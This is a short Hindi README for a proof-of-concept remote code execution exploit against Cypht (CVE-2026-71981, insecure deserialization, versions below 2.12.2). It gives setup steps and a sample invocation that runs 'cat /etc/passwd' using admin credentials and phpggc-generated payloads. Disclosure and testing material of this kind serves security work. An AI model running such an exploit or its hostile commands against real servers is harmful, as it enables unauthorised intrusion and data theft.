
CVE-2026-71981 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Cypht में एक असुरक्षित डिसीरियलाइज़ेशन RCE है। लॉगआउट प्रतिक्रिया के माध्यम से कमांड निष्पादित करता है और आउटपुट प्रिंट करता है। पेलोड जनरेशन के लिए phpggc की आवश्यकता होती है।
यह CVE-2026-71981 असुरक्षित डिसीरियलाइज़ेशन RCE के लिए एक PoC है। निष्पादित कमांड का परिणाम लॉगआउट अनुरोध के प्रतिक्रिया में </body></html> टैग के बाद मुद्रित होता है। पूरी प्रतिक्रिया को भी प्रिंट करने के लिए --print-all का उपयोग करें।
प्रभावित संस्करण: < v2.12.2
इस स्क्रिप्ट को unserialize() पेलोड उत्पन्न करने के लिए स्थापित https://github.com/ambionics/phpggc की आवश्यकता है।
सेटअप और उदाहरण:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help